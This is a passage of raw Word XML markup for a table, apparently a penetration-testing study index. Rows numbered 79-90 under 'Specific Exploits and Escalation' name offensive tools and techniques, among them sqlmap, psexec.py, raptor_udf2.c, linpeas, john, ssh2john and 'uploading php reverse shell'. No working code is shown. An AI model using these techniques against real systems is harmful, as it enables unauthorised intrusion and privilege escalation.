          <w:p w14:paraId="13F0AC2C" w14:textId="19DA870F" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="1309D806" w14:textId="0C557803" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>useful file locations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="3D13D09F" w14:textId="77777777" w:rsidTr="00F15476">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28A3075B" w14:textId="198BCA11" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="115DFB2A" w14:textId="23FB5A1D" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D792A36" w14:textId="24E34A6A" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="0C553D0D" w14:textId="56330EC2" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>smbclient | ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="2C48D98C" w14:textId="77777777" w:rsidTr="00F15476">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0074E935" w14:textId="035AC92A" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="20235306" w14:textId="47E6CE15" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="0634CC93" w14:textId="079A195B" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="3298D5A5" w14:textId="5D118DDD" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="457309BE" w14:textId="77777777" w:rsidTr="00F15476">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DBF630E" w14:textId="732FBDCE" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="0247D746" w14:textId="5E9A114C" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>81</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="191A3AF9" w14:textId="5B2612E3" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E55322F" w14:textId="6A194FD7" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000C579C">
              <w:t>mssqlclient.py (impacket)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> | raptor_udf2.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="3AB39F80" w14:textId="77777777" w:rsidTr="006F5B9C">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BD763AA" w14:textId="0A50D8E7" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="51175310" w14:textId="4017141B" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>82</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="06DA72A5" w14:textId="112383D5"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056CD1A7" w14:textId="4C50DA20" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>psexec.py (impacket, msfconsole)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="74F183D4" w14:textId="77777777" w:rsidTr="006F5B9C">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F94C33D" w14:textId="63E3D989"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0912F6CC" w14:textId="3954E08C" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>83</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="3792987F" w14:textId="6B9CA667"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0DF1164F" w14:textId="44DC3576" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="5BE71FE4" w14:textId="77777777" w:rsidTr="006F5B9C">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03AC33EE" w14:textId="66BD9DD9"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0050F5A6" w14:textId="6F5F6E06" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>84</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="3CECA005" w14:textId="2D693ABF"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5CC3BAEE" w14:textId="566FE427" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>scp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="46FA1566" w14:textId="77777777" w:rsidTr="006F5B9C">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19BC606F" w14:textId="7AED7336"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6ACC495B" w14:textId="766F98EE" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A270964" w14:textId="016E80FC"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06A0195F" w14:textId="7045E4D8" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>linpeas | BeRoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="5D271D51" w14:textId="77777777" w:rsidTr="006F5B9C">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63B314B1" w14:textId="6B042BCB"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682DB4C6" w14:textId="7D650B65" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>86</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="3C7CEE0A" w14:textId="32601A12"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1FC4D4DE" w14:textId="4ECF0002" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>john and crackstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="20F000FB" w14:textId="77777777" w:rsidTr="006F5B9C">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="67C2129D" w14:textId="00216584"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1B50F06C" w14:textId="64F933BA" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B241B7B" w14:textId="300A5161"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033EF2A9" w14:textId="100363C4" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ssh2john</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="0D8ECFC0" w14:textId="77777777" w:rsidTr="006F5B9C">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6DD6F874" w14:textId="6B597630" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="6B066762" w14:textId="5485641E" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>88</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="6FB91482" w14:textId="683F0702" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A54AD73" w14:textId="0DA2C568" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>changing user id values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="16FCE334" w14:textId="77777777" w:rsidTr="00EB0837">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E9D0B42" w14:textId="62FD9FC9" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="79C5B6D1" w14:textId="76B104DB" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="310379F2" w14:textId="690D4649" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D6A02DE" w14:textId="12CBA495" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>uploading php reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB0837" w14:paraId="41F31B75" w14:textId="77777777" w:rsidTr="00466824">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2322CDAF" w14:textId="6DB6D198" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="09398141" w14:textId="522FC866" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="7E204372" w14:textId="45BFCE28" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="36C86C64" w14:textId="4444F58F" w:rsidR="00EB0837" w:rsidRDefault="00B571A0" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SimpleHTTPServer | wget </w:t>
            </w:r>
            <w:r w:rsidR="0093285A">
              <w:t xml:space="preserve">| </w:t>
            </w:r>
